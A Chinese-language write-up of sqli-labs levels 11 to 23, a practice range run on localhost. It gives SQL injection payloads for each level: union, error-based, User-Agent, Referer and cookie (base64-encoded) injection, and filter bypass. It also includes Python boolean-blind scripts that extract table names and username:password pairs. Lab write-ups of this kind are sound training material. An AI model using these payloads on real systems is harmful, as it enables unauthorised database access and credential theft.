sql靶场(11-23)
目录
第十一关(post注入)
第十二关
第十三关
第十四关
第十五关
第十六关
第十七关
第十八关
第十九关
第二十关
第二十一关
第二十二关
第二十三关
第十一关(post注入)
查看页面
我们发现是有注入点的,所以我们可以尝试使用联合查询注入
我们发现联合查询注入是可行的,接下来就是该爆数据库、表、字段和用户账号密码
aaa' union select 1,database()#
aaa' union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
aaa' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa' union select 1,group_concat(username ,0x3a , password) from users#
结果
第十二关
查看页面
尝试之后发现这一关和十一关只是闭合方式不同
aaa") union select 1,database()#
aaa") union select 1,group_concat(table_name) from information_schema.tables where table_schema ='security'#
aaa") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
aaa") union select 1,group_concat(username ,0x3a , password) from users#
结果
第十三关
查看页面,经过测试发现,只有报错注入可以回显,同时闭合方式也和之前有所不同。
aaa') and updatexml(1,user(),1)#
aaa') and updatexml(1,concat('~',(select database()),'~'),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
aaa') and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#由于只能显示一个字段,所以我们使用limit进行逐个输出(我这里只输出第一组用户名和密码,其余自己进行)
第十四关
查看页面,经过测试发现这一关和第十三关只是闭合方式不同,所以我们依旧需要使用报错注入进行注入
aaa" and updatexml(1,user(),1)#
aaa" and updatexml(1,concat('~',(select database()),'~'),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
aaa" and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#结果
第十五关
查看页面,经过不断测试,发现页面只有成功与失败两个界面,所以我的第一想法就是布尔盲注
所以我们使用脚本直接爆出来这关
import requests#爆破数据库名
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# min_value = 32
# max_value = 128
# mid = (min_value + max_value) // 2
# while min_value < max_value:
# data = {
# "uname": "aaaa' or ascii(substr(database(),%d,1))> %d#" % (i,mid),
# "passwd": "aaa"
# }
# r = requests.post(url=url, data=data)
# if "flag.jpg" in r.text:
# min_value = mid + 1
# else:
# max_value = mid
# mid = (min_value + max_value) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name#爆破表名
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# min_value = 32
# max_value = 128
# mid = (min_value + max_value) // 2
# while min_value < max_value:
# data = {
# "uname": "aaa' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'), %d, 1)) > %d#" % (i, mid),
# "passwd": "aaa"
# }
# r = requests.post(url=url, data=data)
# if "flag.jpg" in r.text:
# min_value = mid + 1
# else:
# max_value = mid
# mid = (min_value + max_value) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name#爆破列名
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# min_value = 32
# max_value = 128
# mid = (min_value + max_value) // 2
# while min_value < max_value:
# data = {
# "uname": "aaa' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), %d, 1)) > %d#" % (i, mid),
# "passwd": "aaa"
# }
# r = requests.post(url=url, data=data)
# if "flag.jpg" in r.text:
# min_value = mid + 1
# else:
# max_value = mid
# mid = (min_value + max_value) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name#爆破用户和密码
def inject_database(url):name = ''for i in range(1, 20):min_value = 32max_value = 128mid = (min_value + max_value) // 2while min_value < max_value:data = {"uname": "aaa' or ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d#" % (i, mid),"passwd": "aaa"}r = requests.post(url=url, data=data)if "flag.jpg" in r.text:min_value = mid + 1else:max_value = midmid = (min_value + max_value) // 2if mid == 32:breakname += chr(mid)print(name)return nameif __name__ == "__main__":url = 'http://127.0.0.1/sqllabs/Less-15/'inject_database(url)结果
第十六关
查看页面发现这一关和第十五关只有闭合方式不一样
import requests#爆破数据库名
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# min_value = 32
# max_value = 128
# mid = (min_value + max_value) // 2
# while min_value < max_value:
# data = {
# "uname": 'aaaa") or ascii(substr(database(),%d,1))> %d#' % (i,mid),
# "passwd": "aaa"
# }
# r = requests.post(url=url, data=data)
# if "flag.jpg" in r.text:
# min_value = mid + 1
# else:
# max_value = mid
# mid = (min_value + max_value) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name#爆破表名
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# min_value = 32
# max_value = 128
# mid = (min_value + max_value) // 2
# while min_value < max_value:
# data = {
# "uname": 'aaa") or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="security"), %d, 1)) > %d#' % (i, mid),
# "passwd": "aaa"
# }
# r = requests.post(url=url, data=data)
# if "flag.jpg" in r.text:
# min_value = mid + 1
# else:
# max_value = mid
# mid = (min_value + max_value) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name#爆破列名
# def inject_database(url):
# name = ''
# for i in range(1, 20):
# min_value = 32
# max_value = 128
# mid = (min_value + max_value) // 2
# while min_value < max_value:
# data = {
# "uname": 'aaa") or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users"), %d, 1)) > %d#' % (i, mid),
# "passwd": "aaa"
# }
# r = requests.post(url=url, data=data)
# if "flag.jpg" in r.text:
# min_value = mid + 1
# else:
# max_value = mid
# mid = (min_value + max_value) // 2
# if mid == 32:
# break
# name += chr(mid)
# print(name)
# return name#爆破用户和密码
def inject_database(url):name = ''for i in range(1, 20):min_value = 32max_value = 128mid = (min_value + max_value) // 2while min_value < max_value:data = {"uname": 'aaa") or ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) > %d#' % (i, mid),"passwd": 'aaa'}r = requests.post(url=url, data=data)if "flag.jpg" in r.text:min_value = mid + 1else:max_value = midmid = (min_value + max_value) // 2if mid == 32:breakname += chr(mid)print(name)return nameif __name__ == "__main__":url = 'http://127.0.0.1/sqllabs/Less-16/'inject_database(url)结果
第十七关
这一关查看源码后发现,username不能进行注入了,但是password依然可以进行注入,但是这就有一个前提条件就是username必须输入正确。可以这一关的页面后发现这一关其实就是改密码,既然是改密码那么你就必须知道用户名了
证明我的想法是正确的,就是在密码这里进行注入
aaa' and updatexml(1,user(),1)#
aaa' and updatexml(1,concat('~',(select database()),'~'),1)#
1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#
1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1)#
1' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)#结果
很明显,成功爆出来用户名和密码啦,想要继续爆就修改limit后面的参数就可以啦。
第十八关
查看页面
这一关经过测试感觉和之前的有些区别啦,这时候我分析源码后发现注入点在user-agent上,所以我们可以试着抓包进行注入(使用抓包工具burpsuite进行抓包)
首先使用proxy模块进行抓包,抓取后发送到repeater模块进行分析修改
很明显可以看出来有注入点啦
aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='11' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
很明显成功爆出来了他的用户名和密码。
第十九关
查看页面,感觉这一关和十八关有些类似
我直接进行了抓包,通过不断测试,发现注入点在referer上面
那么我就可以直接注入了
aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='11' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1结果
第二十关
查看页面并登录成功后发现cookie在页面中有点突出
所以直接抓包修改cookie看是不是注入点,结果显而易见是注入点
aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='1admin' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1结果
第二十一关
查看页面并成功登录后发现页面cookie进行了编码
那么我有理由猜测吧payload进行编码再注入,会不会爆出东西呢,试一试,
看来我猜测是没错,那么接下来就是把payload语句进行base64编码后在进行注入,这里不得不说burpsuite的优势了,自带编码模块(感觉挺爽得啦),payload放下面啦,自己进行编码吧
aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1aaa' and updatexml(1,concat('~',(select database()),'~'),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'='11' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'='1admin' and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1结果
第二十二关
查看页面并成功登录后发现页面的cookie依然进行了编码,那我有理由怀疑是不是闭合方式变了呢,直接试一试
因为这个也是需要进行base64编码,自己进行编码
aaa" and updatexml(1,concat(0x7e,(select user()),0x7e),1) and "1"="1aaa" and updatexml(1,concat('~',(select database()),'~'),1) and '1'="11" and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1) and '1'="11" and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema ='security' and table_name='users'),0x7e),1) and '1'="1admin" and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'="1结果
第二十三关
查看页面后发现这一关又回到了我们的老朋友GET传参啦
试过好多后无从下手,解读源代码后发现这一关进行了过滤,
想了一下,既然过滤了注释符,娜美我们直接进行闭合试一试
经过测试发现我的想法是可行的,
那么进行全过程是爆破吧
爆表
http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%27security%27%20and%20%271%27=%271爆字段
http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20%271%27=%271爆用户和密码
http://127.0.0.1/sqllabs/less-23/?id=-1%27%20union%20select%201,2,group_concat(username%20,0x3a%20,%20password)%20from%20users%20where%20%271%27=%271结果
接下来的24关我会放在单独的一片文档中,因为24关事二次注入,所以我还会引入两个ctf的二次注入
